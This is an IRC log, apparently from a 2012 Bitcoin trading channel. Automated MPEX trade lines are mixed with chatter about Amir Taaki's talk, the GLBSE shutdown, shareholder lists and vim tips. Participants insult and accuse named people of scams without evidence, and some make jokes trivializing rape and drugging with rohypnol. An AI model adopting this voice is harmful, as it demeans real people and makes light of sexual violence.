what isn't illegal there... Dec 05 12:58:09 heh Dec 05 13:06:11 [MPEX] [S.MPOE] 2924 @ 0.00052204 = 1.5264 BTC [+] Dec 05 13:06:12 [MPEX] [S.MPOE] 8309 @ 0.00052206 = 4.3378 BTC [+] Dec 05 13:06:14 [MPEX] [S.MPOE] 7921 @ 0.00052446 = 4.1542 BTC [+] Dec 05 13:06:15 [MPEX] [S.MPOE] 5597 @ 0.00052592 = 2.9436 BTC [+] Dec 05 13:20:39 [MPEX] [S.MPOE] 4321 @ 0.0005257 = 2.2715 BTC [-] Dec 05 13:20:41 [MPEX] [S.MPOE] 503 @ 0.00052592 = 0.2645 BTC [+] Dec 05 13:20:42 [MPEX] [S.MPOE] 15635 @ 0.00052596 = 8.2234 BTC [+] Dec 05 13:22:26 [MPEX] [S.MPOE] 3432 @ 0.00052596 = 1.8051 BTC [+] Dec 05 13:22:27 [MPEX] [S.MPOE] 6468 @ 0.00052602 = 3.4023 BTC [+] Dec 05 13:24:33 [MPEX] [S.MPOE] 13282 @ 0.00052602 = 6.9866 BTC [+] Dec 05 13:24:35 [MPEX] [S.MPOE] 418 @ 0.00052612 = 0.2199 BTC [+] Dec 05 13:38:46 [MPEX] [S.MPOE] 4321 @ 0.00052169 = 2.2542 BTC [-] Dec 05 13:38:48 [MPEX] [S.MPOE] 25550 @ 0.00052141 = 13.322 BTC [-] Dec 05 13:38:49 [MPEX] [S.MPOE] 6524 @ 0.00051759 = 3.3768 BTC [-] Dec 05 13:42:21 [MPEX] [S.MPOE] 4321 @ 0.00052589 = 2.2724 BTC [+] Dec 05 13:42:22 [MPEX] [S.MPOE] 17219 @ 0.00052612 = 9.0593 BTC [+] Dec 05 13:42:24 [MPEX] [S.MPOE] 8800 @ 0.00052622 = 4.6307 BTC [+] Dec 05 13:42:25 [MPEX] [S.MPOE] 760 @ 0.00052632 = 0.4 BTC [+] Dec 05 13:59:52 [MPEX] [S.MPOE] 18240 @ 0.00052632 = 9.6001 BTC [+] Dec 05 13:59:54 [MPEX] [S.MPOE] 9535 @ 0.00052643 = 5.0195 BTC [+] Dec 05 14:07:22 [MPEX] [S.MPOE] 4321 @ 0.00051788 = 2.2378 BTC [-] Dec 05 14:07:24 [MPEX] [S.MPOE] 901 @ 0.00051759 = 0.4663 BTC [-] Dec 05 14:07:25 [MPEX] [S.MPOE] 6378 @ 0.000517 = 3.2974 BTC [-] Dec 05 14:11:09 [MPEX] [S.MPOE] 4321 @ 0.0005172 = 2.2348 BTC [+] Dec 05 14:11:10 [MPEX] [S.MPOE] 20041 @ 0.000517 = 10.3612 BTC [-] **** BEGIN LOGGING AT Wed Dec 5 22:55:17 2012 Dec 05 23:04:04 [MPEX] [S.MPOE] 13900 @ 0.00051078 = 7.0998 BTC [+] Dec 05 23:06:25 pigeons : http://trilema.com/2012/amir-taaki-has-done-and-continues-to-do-huge-disservice-to-anyone-serious-involved-in-bitcoin/ Dec 05 23:06:28 there's your transcript. Dec 05 23:06:52 mpoe-pr broke out in hives reading it. i haven't read it myself. Dec 05 23:09:28 i can't read it because of the "uh's" Dec 05 23:10:03 would be funnier translated into english Dec 05 23:10:21 like the english 50 cent twitter account Dec 05 23:10:58 [MPEX] [S.MPOE] 5150 @ 0.00051078 = 2.6305 BTC [+] Dec 05 23:10:59 [MPEX] [S.MPOE] 3643 @ 0.0005164 = 1.8812 BTC [+] Dec 05 23:11:01 [MPEX] [S.MPOE] 3514 @ 0.00051758 = 1.8188 BTC [+] Dec 05 23:11:08 lol ? Dec 05 23:11:12 so what am i reading? Dec 05 23:11:27 jcpham some talk given by that genjix imbecile. Dec 05 23:11:29 click the link at the top Dec 05 23:11:35 when was it given? Dec 05 23:12:49 mircea_popescu: possibly the finest use of twitter ever, https://twitter.com/English50cent (ignore the latest stuff) Dec 05 23:13:02 jcpham: you may need a strong drink to get through that Dec 05 23:13:10 jcpham there's a link in the intro giving context/source etc. Dec 05 23:14:42 i can't handle the uh's Dec 05 23:14:57 it's bad public speaking and it bothers me a lot Dec 05 23:19:51 myeah. Dec 05 23:24:29 i just wanted you to watch it mircea_popescu Dec 05 23:25:22 its good to watch it Dec 05 23:25:38 yawell, we don't always get what we want. Dec 05 23:25:40 ugh i see why she got hives. so much bad information from that guy. Dec 05 23:26:14 yeah a shame. Dec 05 23:26:37 i have seen it before and ill see it again. Dec 05 23:27:59 lol when people ask me how btc comes from, im gonna tell 'em: Dec 05 23:28:01 Mathematics. Yeah. Dec 05 23:28:10 s/how/where Dec 05 23:28:21 its true Dec 05 23:28:25 you do 1+1 and you have 2 btc Dec 05 23:28:26 [MPEX] [S.MPOE] 29554 @ 0.00051758 = 15.2966 BTC [+] Dec 05 23:28:45 2.14 if you are pirate Dec 05 23:29:02 1% per day baby! Dec 05 23:29:12 haha Dec 05 23:31:01 mircea_popescu, thanks mpoe-pr for transcription... i can now try to digest all that wisdom Dec 05 23:31:03 pigeons I guess nefario shut down glbse and will start a clone site meaning the shareholders get screwed too Dec 05 23:31:26 nowai he will start a clone Dec 05 23:31:32 even if he manages to code it Dec 05 23:31:42 i imagine it would have to be attempted under a new identity Dec 05 23:31:59 doubt it Dec 05 23:32:02 i don't think he believes he has any trust left Dec 05 23:32:08 he is too big of a chicken Dec 05 23:32:14 [MPEX] [S.MPOE] 4321 @ 0.00051058 = 2.2062 BTC [-] Dec 05 23:32:15 [MPEX] [S.MPOE] 981 @ 0.00051051 = 0.5008 BTC [-] Dec 05 23:32:21 jurov she didn't do it, it fell on the new girl. Dec 05 23:32:23 oh yeah this is the "legit" thing Dec 05 23:33:00 meanwhile in legit news : http://calvinayre.com/2012/11/30/conferences/social-gaming-asia-summit-summary-ao-video Dec 05 23:33:05 bitcoin is at 1:45 Dec 05 23:34:07 new girl mp? Dec 05 23:34:10 pics or gtfo Dec 05 23:34:16 http://imgur.com/gallery/NYDMZ << win Dec 05 23:34:26 this is not female Dec 05 23:34:29 kakobrekla she's shy. and besides! wtf business am i running here. Dec 05 23:34:37 porn no? Dec 05 23:34:38 this ain't a cunnyshack Dec 05 23:42:56 [MPEX] [S.DICE] 1565 @ 0.00328056 = 5.1341 BTC [+] Dec 05 23:46:25 https://bitcointalk.org/index.php?topic=129337.0 << Dec 05 23:48:36 that video gave me cancer Dec 05 23:49:16 this is why i'm going to live to bury all of oyu. Dec 05 23:49:21 i don't watch cancer videos. Dec 05 23:50:20 i'll genjixroll you one day Dec 05 23:50:43 lol Dec 05 23:51:34 a place I worked had a customer that claimed we gave him bowel cancer and killed him Dec 05 23:51:35 lol Dec 05 23:51:53 s/a place/fastfood/ Dec 05 23:52:01 because he could only get 9something Mbit out of his 10Mbit cable connection Dec 05 23:52:14 and all teh years complaining about it had caused the stress that caused the cancer etc Dec 05 23:52:39 and also that one time, at night, he shoved the antenna up his ass. Dec 05 23:52:47 one time? Dec 05 23:53:02 i mean if I knew hot to give cancer out over the internet, we wouldnt have this problem with genjix Dec 05 23:53:09 how* Dec 05 23:53:24 ahahaha Dec 05 23:54:56 if only you could punch people in the face over the internet Dec 05 23:55:26 there would be lots of broken teeth Dec 05 23:55:31 the only thingthat'd do would be a service of internet gloryhole Dec 05 23:55:40 where "straight" pasty fatasses would suck each other off Dec 05 23:55:45 o wait.... that's how it already works! Dec 05 23:59:28 [MPEX] [S.MPOE] 8650 @ 0.00051051 = 4.4159 BTC [-] Dec 06 00:01:35 and now for something completely different. http://www.youtube.com/watch?v=49UZa0TO2zQ Dec 06 00:01:57 [MPEX] [S.MPOE] 4321 @ 0.00051756 = 2.2364 BTC [+] Dec 06 00:01:59 [MPEX] [S.MPOE] 3029 @ 0.00051758 = 1.5677 BTC [+] Dec 06 00:04:40 [MPEX] [S.MPOE] 4321 @ 0.00051064 = 2.2065 BTC [-] Dec 06 00:04:42 [MPEX] [S.MPOE] 9621 @ 0.00051051 = 4.9116 BTC [-] Dec 06 00:04:43 [MPEX] [S.MPOE] 15558 @ 0.00051017 = 7.9372 BTC [-] Dec 06 00:05:00 jesus fuck I spent a lot in getting drunk the other night Dec 06 00:05:27 What the heck is that transcript for? Dec 06 00:05:52 there's a link in the intro giving context/source etc. Dec 06 00:05:59 amir speaking at a finance conference Dec 06 00:06:27 ah, bought case of bollinger Dec 06 00:06:30 that helps Dec 06 00:06:46 [MPEX] [S.MPOE] 2855 @ 0.00051017 = 1.4565 BTC [-] Dec 06 00:06:46 [MPEX] [S.MPOE] 6256 @ 0.00050643 = 3.1682 BTC [-] Dec 06 00:09:47 Which conference? Why? Who's Amir? Dec 06 00:10:04 ;;seen genjix Dec 06 00:10:04 genjix was last seen in #bitcoin-assets 8 weeks, 6 days, 6 hours, 9 minutes, and 55 seconds ago: nefario is legit. for sure there is a reasonable explanation and everyone will get their bitcoins back. i trust the guy. Dec 06 00:10:13 ahahaha Dec 06 00:10:17 lol Dec 06 00:10:24 that is golden Dec 06 00:10:29 hahaha Dec 06 00:10:32 then i told him to suck it and then he left Dec 06 00:10:49 Namjies: Amir is founder of interscamgo Dec 06 00:11:20 also chief bitcoin fuckwad and oxygen waster Dec 06 00:11:36 he should do a trio with wright and wagner. Dec 06 00:11:40 the WWT Dec 06 00:12:25 i miss antagonizing MNW Dec 06 00:13:35 it boggles to think that at some point bitcoin was so in the shit people like these were either apparently or actually contributing Dec 06 00:14:35 nah i just miss MNW coming on IRC and talking shit Dec 06 00:14:45 oh and betting people bitcoins he doesn't have Dec 06 00:14:49 that too Dec 06 00:14:51 goat still comes around. Dec 06 00:14:57 :p Dec 06 00:15:09 i don't think goat quite raises to the level Dec 06 00:15:14 he's more in the usagi league. Dec 06 00:15:21 goat calls me names so he and i aren't associates Dec 06 00:15:29 what'd he call you, Pam ? Dec 06 00:15:39 I feel like Bitcoin are being grossly misrepresented... Dec 06 00:15:40 opportunist troll Dec 06 00:15:42 iirc Dec 06 00:15:52 that's an oxymoron Dec 06 00:15:56 which is very humorous Dec 06 00:16:09 bruce wagner still sells bitcoins to people.... Dec 06 00:16:17 Namjies by idiots like genjix running around yeah. Dec 06 00:16:28 Namjies: posta bout it here https://bitcointalk.org/index.php?topic=129337.0 Dec 06 00:17:00 [MPEX] [S.MPOE] 4321 @ 0.00050645 = 2.1884 BTC [+] Dec 06 00:17:01 [MPEX] [S.MPOE] 3300 @ 0.00050643 = 1.6712 BTC [-] Dec 06 00:17:18 How do they chose their panels for conferences? Take the guy shouting: "Me! Take me! I are largest expert Bitcoin!" Dec 06 00:18:01 someone should show up and ask questions about the various scams of intersango Dec 06 00:18:26 I could have done a presentation 100 times clearer and informational without even knowing the exact way Bitcoins work within the code. Just the general simplified concept. Dec 06 00:18:39 Anyone else could have done it. Dec 06 00:18:45 He googled something? Dec 06 00:18:52 if != crackhead Dec 06 00:19:01 Why didn't he have a presentation prepared? Dec 06 00:19:14 during the occupy protests the government sent in mental patients to make it look bad Dec 06 00:19:40 hm Dec 06 00:19:45 if i was a banker i would find the most retarded bitcoiners around and put them in front of audiences Dec 06 00:19:45 that only makes it look better Dec 06 00:19:51 just to let the chan know, S²CM just got its shareholder infos Dec 06 00:20:34 how many shareholders were nefario ? Dec 06 00:20:34 schutzstaffel delivers. Dec 06 00:20:44 noagendamarket: hard to say Dec 06 00:21:14 Oh right... Kraken had some units bought by Patrick himself. Dec 06 00:21:26 apparently Dec 06 00:21:40 So when he paid 50% back... I could now not pay him and have some more. Dec 06 00:21:51 For others. Dec 06 00:21:54 fuck that guy Dec 06 00:22:24 smickles is my new boyfriend! Dec 06 00:22:47 and I just got the Kraken list. Dec 06 00:22:52 nice Dec 06 00:23:02 guys maybe nefario isn't a fuckwit after all Dec 06 00:23:09 :X Dec 06 00:23:14 perhaps he was right Dec 06 00:23:16 >> nefario is legit. Dec 06 00:23:45 He is... looking at all what he did. But he tries to be at least honest even if he made huge mistakes... Dec 06 00:24:24 http://bankinnovation.net/2012/12/ashton-kutcher-for-banker-of-the-year/ Dec 06 00:24:34 he acts like a chicked with its head chopped off, runs around for a comple of minutes w/o it Dec 06 00:24:54 chicken* Dec 06 00:24:58 hes a paranoid coward Dec 06 00:25:03 kutcher should've invested in coinbase Dec 06 00:26:40 upvote: http://www.reddit.com/r/Bitcoin/comments/14cj3r/amir_taaki_aka_genjix_shows_how_not_to_promote/ Dec 06 00:26:42 I wish I could "invest" in mila kunis Dec 06 00:26:48 smickles did you get the data for all shares? Dec 06 00:27:07 How do they chose their panels for conferences? Take the guy shouting: "Me! Take me! I are largest expert Bitcoin!" << pretty much Dec 06 00:27:56 schutzstaffel delivers. << ahahaha Dec 06 00:28:46 kakobrekla: all shares appear to be accounted for (assuming trust for the data ofc) Dec 06 00:29:05 you guys should be nicer to genjix Dec 06 00:30:06 yes poor genjix. they woke him up at 3am and forced him to do presentation quickly Dec 06 00:30:23 let me find that nefario quote again Dec 06 00:30:47 and then handed him his backpack and kicked him right out Dec 06 00:31:01 ruthless Dec 06 00:34:10 It's a conspiracy from the banks, they paid him well to do that on purpose so Bitcoins would look bad! (Made with the support of How to Start Another Movement of Conspiracy Nuts in One Line for Dummies) Dec 06 00:34:22 [MPEX] [S.MPOE] 3050 @ 0.00050924 = 1.5532 BTC [+] Dec 06 00:34:28 shit the banks can pay me and i'll make it look worse Dec 06 00:35:03 he just wasn't used to talking to that type of audience Dec 06 00:35:31 Sep 16 01:13:21 I haven't even written my talk for tomorrow Dec 06 00:35:35 he shouldnt talk at all Dec 06 00:36:59 Bitcoin Conferencers: Mission Preparation Zero - In theaters January 4th. Dec 06 00:37:13 "Whats wrong with this? The guy seems very genuine." reddit rules Dec 06 00:38:31 Its more cringeworthy than the time atlas called into the bitcoin show with bruce fagner Dec 06 00:38:43 [MPEX] [S.MPOE] 3300 @ 0.00050708 = 1.6734 BTC [-] Dec 06 00:39:11 Actually, for people who thinks Bitcoins are for nutcases or are nutcases themselves, that guy will seem very genuine indeed. Dec 06 00:39:38 "dublinclontarf" is that nefario ??? Dec 06 00:39:44 and BTC-BOND Dec 06 00:39:48 I got the list for it too Dec 06 00:40:04 The world is starting to go round again. Dec 06 00:41:16 [MPEX] [S.MPOE] 1271 @ 0.00050924 = 0.6472 BTC [+] Dec 06 00:41:18 [MPEX] [S.MPOE] 14867 @ 0.00050932 = 7.5721 BTC [+] Dec 06 00:42:18 yes it is nefario Dec 06 00:42:30 not dog? Dec 06 00:42:31 Why is it all in yml? Couldn't he send a csv? Dec 06 00:42:31 https://github.com/dublinclontarf Dec 06 00:42:37 pigeons so says mpoe-pr too Dec 06 00:43:08 http://stackoverflow.com/users/366845/dublinclontarf Dec 06 00:43:30 Now I have to do a search and replace to replace delimiters superflous data to commas. Dec 06 00:43:42 Then make that into a spreadsheet. Dec 06 00:43:43 lol Dec 06 00:43:52 be happy your yml parses. iirc giga was saying his didn't. Dec 06 00:45:25 I use notepad++ to do the search and replace... Dec 06 00:45:43 then open office to open the list with the comma delimiters. Dec 06 00:46:09 [MPEX] [S.MPOE] 2833 @ 0.00050932 = 1.4429 BTC [+] Dec 06 00:46:12 [MPEX] [S.MPOE] 16567 @ 0.00051016 = 8.4518 BTC [+] Dec 06 00:46:12 At worst if there's a bad line, you'll see it when doing the search and replace in notepad++ Dec 06 00:46:13 just use vim like :% s/x/y/g Dec 06 00:46:48 where say, you want to replace colon with comma: s/:/,/g Dec 06 00:46:52 globally Dec 06 00:46:58 thats my vim tip of the day, tyvm Dec 06 00:47:38 <3 vim Dec 06 00:48:45 vim? Dec 06 00:49:12 bah. I'll keep notepad++ Dec 06 00:49:12 vi improved Dec 06 00:49:28 I'll still keep notepad++ Dec 06 00:50:14 the power of bash is like bitcoin : before you learn how to use it you don't understand why you should Dec 06 00:50:21 after you don't understand how you lived before. Dec 06 00:51:21 [MPEX] [S.MPOE] 20454 @ 0.00051016 = 10.4348 BTC [+] Dec 06 00:51:23 [MPEX] [S.MPOE] 5646 @ 0.00051092 = 2.8847 BTC [+] Dec 06 00:53:11 Sounds like the usual speech about just EVERYTHING. Dec 06 00:54:22 Religious people use the same speech. You don't understand why my god is so great until you know it and you won't understand how you lived without it before. Dec 06 00:54:46 "My thing is the greatest, you'd understand if you did like me." Dec 06 00:55:19 If I was you, I'd probably think like you indeed since I'd be you. Dec 06 00:56:30 (14:50) < mircea_popescu> after you don't understand how you lived before. Dec 06 00:56:54 [MPEX] [S.MPOE] 1154 @ 0.00051092 = 0.5896 BTC [+] Dec 06 00:56:55 [MPEX] [S.MPOE] 18346 @ 0.00051249 = 9.4021 BTC [+] Dec 06 00:56:59 ^^^ this is correct though. once you learn how to use a terminal or a scripting language or bitcoin, you'll be like "how did i ever do anything before??" Dec 06 00:57:08 Summary: I don't find the statement convincing. Dec 06 00:57:51 what can i say. Dec 06 00:58:12 mod6: I beg to differ. You can leech of others who could make it for you. Same result, less work. Dec 06 00:59:39 no but you never get what you want when you want it, you get what they made Dec 06 01:00:02 ^^^ good point. Dec 06 01:00:09 you can either make your own money or marry some rich dude Dec 06 01:00:19 they're not the same. Dec 06 01:01:07 Except it's a different kind of relationship with the marrying example. Dec 06 01:01:08 rich gal works too Dec 06 01:01:21 lol Namjies, that was far from the point. some where between A & Z, someone has to actually do some shit. Dec 06 01:01:31 Indeed. Dec 06 01:01:41 there's no different kinds of relationships Dec 06 01:01:46 all are the exact same kind. Dec 06 01:01:47 and when you find a new too that kicks ass, it makes you stunned that you'd ever gotten by without it. Dec 06 01:02:05 s/too/tool Dec 06 01:02:16 ^^^ like that ;) Dec 06 01:03:07 http://securityledger.com/new-25-gpu-monster-devours-passwords-in-seconds/ daaamn Dec 06 01:03:46 almosty good enough to mine. Dec 06 01:03:52 The marrying example, the woman kind of prostitues herself for the guy's money. For coding, the developer kind of prositutes work for money. And not the other way around. The guy hiring the dev is more like the rich guy, not the woman marrying it. Dec 06 01:03:57 but to each their own, everyone has got a way. and i'd say further that when leaving the ways of the layman behind, you have to adopt more efficent tools to help you compete in the market place. Dec 06 01:04:53 steal your own wallet super efficiently Dec 06 01:04:54 Pay the other for something they have. Dec 06 01:05:00 noagendamarket in the comments at the bottom he admits to mining bitcoins Dec 06 01:05:06 lawl Dec 06 01:06:06 For coding, the developer kind of prositutes work for money. << Is this not true with any service based industry - Time & Services for Capital? Dec 06 01:06:08 Namjies money and sex, in a simplified consideration, are both valuable. there's not a rule that he who has the money is in charge. Dec 06 01:06:26 in the other example, money or sex and skill are each valuable. Dec 06 01:06:35 again, there's not a rule that he who pays is in charge. Dec 06 01:06:57 If you dont hav e money you wont get much sex :P Dec 06 01:09:14 depends Dec 06 01:09:34 rape is free Dec 06 01:10:20 lol Dec 06 01:10:31 rohypnol is cheap Dec 06 01:10:34 pokeing continiues https://bitcointalk.org/index.php?topic=124441.msg1380857;topicseen#msg1380857 Dec 06 01:11:11 rape isnt usually about the sex Dec 06 01:11:25 its a power thing Dec 06 01:11:39 mircea, no, not necessarily. Dec 06 01:12:05 When you pay someone, the other might be in charge/making decision. Dec 06 01:13:17 I suppose the situation can be interpreted both ways as such. Dec 06 01:16:49 [MPEX] [S.MPOE] 8550 @ 0.00051141 = 4.3726 BTC [-] Dec 06 01:16:50 [MPEX] [S.MPOE] 4321 @ 0.00051235 = 2.2139 BTC [+] Dec 06 01:16:51 [MPEX] [S.MPOE] 7404 @ 0.00051249 = 3.7945 BTC [+] Dec 06 01:16:52 [MPEX] [S.MPOE] 8181 @ 0.00051628 = 4.2237 BTC [+] Dec 06 01:16:53 [MPEX] [S.MPOE] 2844 @ 0.00051734 = 1.4713 BTC [+] Dec 06 01:17:29 kakobrekla cock is usually hard to swallow, especially if it's one's first time and the thing is as thick as mine. Dec 06 01:18:18 I need to uniognore inaba to see that :( Dec 06 01:19:24 aaand it wasnt worth it Dec 06 01:19:33 o hey, seems caldwell and the girl are going at it. Dec 06 01:19:35 this promises. Dec 06 01:21:36 >In fairness, I can't spell your name either, Mr. P can't, your name is just too much to spell. Dec 06 01:21:38 LOL Dec 06 01:21:50 lol Dec 06 01:23:01 When I promote bitcoin I always wear a homeless jacket Dec 06 01:23:22 and ensure I havent washed for 2 months Dec 06 01:23:30 we gotta thank pigeons tho Dec 06 01:23:42 i wasn't expecting that today's portion of drama would come out of that obscure youtube Dec 06 01:24:02 its a good course as well. Dec 06 01:24:46 Im just surprised genjix hasnt applied for a bitcoin foundation grant yet Dec 06 01:25:09 for a public speaking tour lol Dec 06 01:25:14 how you know h hasn't ? Dec 06 01:26:06 trollfest 2013 Dec 06 01:29:51 [MPEX] [S.MPOE] 18800 @ 0.00051571 = 9.6953 BTC [-] Dec 06 01:32:32 proudhon's avatar RULES https://bitcointalk.org/index.php?action=dlattach;attach=9220;type=avatar Dec 06 01:32:51 [MPEX] [S.MPOE] 1835 @ 0.00051571 = 0.9463 BTC [-] Dec 06 01:32:52 [MPEX] [S.MPOE] 3363 @ 0.00050708 = 1.7053 BTC [-] Dec 06 01:32:59 lmao Dec 06 01:35:01 I wonder why the cia hasnt setup a hamas donation fund for bitcoins yet Dec 06 01:35:14 just as a honeypot lol Dec 06 01:35:28 i would send a bitcoin. Dec 06 01:35:39 then they can make a song and dance about bitcoin funding terrorism in the senate Dec 06 01:36:12 jgarzik would have a heart attack Dec 06 01:36:29 he'll get over it. Dec 06 01:36:45 I mean techinically theres nothing stopping anyone doing that Dec 06 01:36:47 [MPEX] [S.MPOE] 12956 @ 0.00051734 = 6.7027 BTC [+] Dec 06 01:36:48 [MPEX] [S.MPOE] 2153 @ 0.00051758 = 1.1143 BTC [+] Dec 06 01:36:50 [MPEX] [S.MPOE] 34291 @ 0.00051769 = 17.7521 BTC [+] Dec 06 01:36:51 even as a troll Dec 06 01:37:50 Im not saying you should do it lol Dec 06 01:38:52 http://www.screwitletsgo.com/wp-content/uploads/2012/05/Rage-Face.jpg Dec 06 01:39:01 why bother when Pirate and Amir are doing the job for them Dec 06 01:39:28 may as well finish it off with a right hook to the jaw Dec 06 01:40:00 they kinda failed swith silk road Dec 06 01:40:14 I assume the CIA are either content to let us marginalise ourselves for the moment, or using bitcoin themselves on a scale that warrants leaving it alone Dec 06 01:41:14 someone: you know bitcoin could be used to fund terrorism Dec 06 01:41:21 cia: really? sweet! Dec 06 01:41:29 dub heh Dec 06 01:41:32 lol Dec 06 01:41:49 they need to pay osama somehow... Dec 06 01:42:12 after all he demolished a couple of buildings for them Dec 06 01:42:29 coins at 1osama havent been moved in long time Dec 06 01:42:46 they are hiding in 1cave Dec 06 01:44:02 george bush's bitcoin address is 1insidejob Dec 06 01:44:11 haha Dec 06 01:51:35 [MPEX] [S.MPOE] 7059 @ 0.00051769 = 3.6544 BTC [+] Dec 06 01:51:36 [MPEX] [S.MPOE] 10841 @ 0.00051825 = 5.6183 BTC [+] Dec 06 01:52:43 [MPEX] [S.MPOE] 6259 @ 0.00051825 = 3.2437 BTC [+] Dec 06 01:52:44 [MPEX] [S.MPOE] 8141 @ 0.00051892 = 4.2245 BTC [+] Dec 06 01:54:34 and clinton's is 1outsidejob ? Dec 06 01:55:07 1cigar Dec 06 01:55:22 1dress Dec 06 01:55:41 1inchlarger Dec 06 01:55:44 send now Dec 06 01:55:53 lol Dec 06 02:02:57 [MPEX] [S.MPOE] 1700 @ 0.00051892 = 0.8822 BTC [+] Dec 06 02:08:56 [MPEX] [S.DICE] 1001 @ 0.00328057 = 3.2839 BTC [+] Dec 06 02:08:57 [MPEX] [S.DICE] 99 @ 0.00328056 = 0.3248 BTC [-] Dec 06 02:14:58 [MPEX] [S.MPOE] 20600 @ 0.00051892 = 10.6898 BTC [+] Dec 06 02:16:52 ahahah this entire caldwell whining that the transcriber didn't censor the ums is really hysterical Dec 06 02:16:58 haha nefario deleted his comment Dec 06 02:17:09 http://www.reddit.com/r/Bitcoin/comments/14cj3r/amir_taaki_aka_genjix_shows_how_not_to_promote/ Dec 06 02:17:10 uhh? Dec 06 02:18:07 lol maybe he takes it seriously and never mentions bitcoin again. Dec 06 02:20:22 what has been seen cant be unseen Dec 06 02:21:44 I think james will need to change his name by deed poll if he ever want5s to open another business Dec 06 02:22:10 can he ? Dec 06 02:22:33 i mean it'd be technically fraud, you can only change your name by poll if you're not doing it to escape debts etc Dec 06 02:22:38 yes Dec 06 02:22:40 iirc it's criminalized Dec 06 02:23:01 hes not facing charges that we know of Dec 06 02:23:24 unless hes got an a ctual lawsuit hes free to do anything Dec 06 02:24:00 ofcourse he's free to do anything. Dec 06 02:24:16 but in the event of an ulterior lawsuit if it turns out he changed his name it may spell additional trouble. Dec 06 02:24:24 If anyone held BTC-MINING/BTC-BOND/KRAKEN: https://bitcointalk.org/index.php?topic=129362.0 Dec 06 02:28:31 [MPEX] [S.MPOE] 4950 @ 0.00051892 = 2.5687 BTC [+] Dec 06 02:30:44 [MPEX] [S.MPOE] 30800 @ 0.00051892 = 15.9827 BTC [+] Dec 06 02:33:18 why would anyone sue him if he has sent back most of the asset info and btc ? Dec 06 02:33:36 [MPEX] [S.MPOE] 4450 @ 0.00051892 = 2.3092 BTC [+] Dec 06 02:34:21 unless they have thousands of dollars to waste for no reason Dec 06 02:35:02 is he up to "most" yet? Dec 06 02:35:31 maybe with today/yesterday's lists,certainly not before Dec 06 02:35:51 Not before. With today's, He might be getting close. Dec 06 02:36:10 and claims from before I received lists seems to match. Dec 06 02:36:47 From old users which pre-date GLBSE's closure to top it. Dec 06 02:37:16 Unless they're all conspirating together the lists are probably accurate. Dec 06 02:39:48 I dont think hes scamming in the same way patrick harnett is scamming over kraken Dec 06 02:40:47 noagendamarket = stockholm syndrome Dec 06 02:40:52 I don't think so either. Seems like he chickened out and is error prone, but otherwise honest. Still, it's a mess. Dec 06 02:41:27 [MPEX] [S.MPOE] 6209 @ 0.00051892 = 3.222 BTC [+] Dec 06 02:41:28 [MPEX] [S.MPOE] 9527 @ 0.00051965 = 4.9507 BTC [+] Dec 06 02:41:30 [MPEX] [S.MPOE] 2964 @ 0.00052028 = 1.5421 BTC [+] Dec 06 02:41:36 yes its a mess alright Dec 06 02:41:47 Namjies Dec 06 02:41:53 Aye? Dec 06 02:41:55 what is your plans for things at this point? Dec 06 02:42:01 thought any more on it? Dec 06 02:42:11 pigeons I think he lacks the balls to be a scammer :D Dec 06 02:42:19 Paying people back and closing things, probably. Dec 06 02:42:34 sucks Dec 06 02:42:54 Well... maybe. Kind of. Dec 06 02:43:42 Might still operate BTC-BOND tho. Dec 06 02:44:10 btc-bond wasnt too bad Dec 06 02:44:22 mining stocks suck ass lol Dec 06 02:44:40 What? Not that much. Dec 06 02:44:50 well while difficulty is going up perhaps Dec 06 02:44:57 [MPEX] [S.MPOE] 3950 @ 0.00051495 = 2.0341 BTC [-] Dec 06 02:45:08 pigeons i don't even want to see the wave of mining bond failures if diff went down 80% Dec 06 02:45:17 :) Dec 06 02:45:30 ouch Dec 06 02:47:12 not likely to happen though Dec 06 02:47:21 Namjies: would you consider BF if you decide to keep btc-bond? Dec 06 02:47:25 that's exactly how systemic defaults happen Dec 06 02:47:42 What's BF? Dec 06 02:47:47 bitfunder Dec 06 02:47:50 my glbse replacement Dec 06 02:47:58 mircea_popescu: BF went live a bit ago Dec 06 02:48:04 has 1 asset setting up to sell atm heh Dec 06 02:48:08 Ah, probably not. Dec 06 02:48:16 not the graetest asset, but its better than starting with 0 Dec 06 02:48:17 lol Dec 06 02:49:19 Namjies: alright. just wanted to toss it out. :) Dec 06 02:49:32 If I had to use a platform, I'd probably use the Belize based LitecoinGlobal/BTCT.co Dec 06 02:49:33 if you get curious you can always play on sandbox.bitfunder.com Dec 06 02:50:12 "We (BitFunder) do not accept responsibility for anything. Dec 06 02:50:12 WARNING: Use at your own risk. Dec 06 02:50:12 You must agree to 1 and 2." Dec 06 02:50:24 surely you jest Dec 06 02:50:52 noagendamarket: do you think any of the other agreements are any better? Dec 06 02:50:54 look at glbse Dec 06 02:50:57 how well that worked out Dec 06 02:51:04 its more of alie Dec 06 02:51:06 a lie Dec 06 02:51:07 than anything Dec 06 02:51:28 it doesnt tell me who or what is behind the "company" Dec 06 02:51:50 I'm mostly concerned about either having a system with easy proof of ownership or at least regular backups of holders data. Dec 06 02:52:16 Namjies: my system uses btc addresses to publically list holders data live Dec 06 02:52:20 colored coins would be the best option as far as I'm concerned. Dec 06 02:52:31 which makes it easy for ppl to migrate to Dec 06 02:52:34 yeah to colored if they wanted Dec 06 02:52:36 later Dec 06 02:52:44 just disable trading on teh asset, and move Dec 06 02:52:47 decentralized exchanges are far worse than glbse disasters Dec 06 02:52:51 I wont bust you for leaving Dec 06 02:53:04 ownership deeds on the blockchain tools are not really developed yet tho Dec 06 02:53:43 its hard to beat placing a lien on someones actual property if they fail to pay Dec 06 02:53:44 why? Because anyone can do anything on decentralized? Dec 06 02:53:59 yes Dec 06 02:54:40 I hardly see the difference... anyone could do almost anything on GLBSE. Dec 06 02:54:47 truth Dec 06 02:55:11 look at bitdaytrade for example Dec 06 02:55:13 The difference is that decentralized, data is not lost and public yet anonymous as much as the user wishes to be. Dec 06 02:55:26 he had the guys passport and full identity lol Dec 06 02:55:37 User still has to investigate anything before purchasing. Dec 06 02:55:54 agreed Dec 06 02:56:10 actually it might make people be more careful without seat belts Dec 06 02:56:40 btcjam has 50% default rate and they use credit checks.... Dec 06 02:57:09 Technically, even a regulated market could be issued on decentralized and have their official app tracking official deeds and for trading. Dec 06 02:57:18 http://www.technologyreview.com/news/508061/custom-chips-could-be-the-shovels-in-a-bitcoin-gold-rush/ Dec 06 02:57:20 LOL Dec 06 02:57:37 btcjam uses credit checks ?! i doubt it. Dec 06 02:57:37 someone needs to tell these guys bfl is most likely a scam Dec 06 02:57:47 for one, they cost money. for the other, pfff. who's btcjam Dec 06 02:57:55 Assuming any government would allow such smoother regulations where they regulate only who can get issued into their official market without regulating trades. Dec 06 02:58:03 its basically glbse 3.0 lol Dec 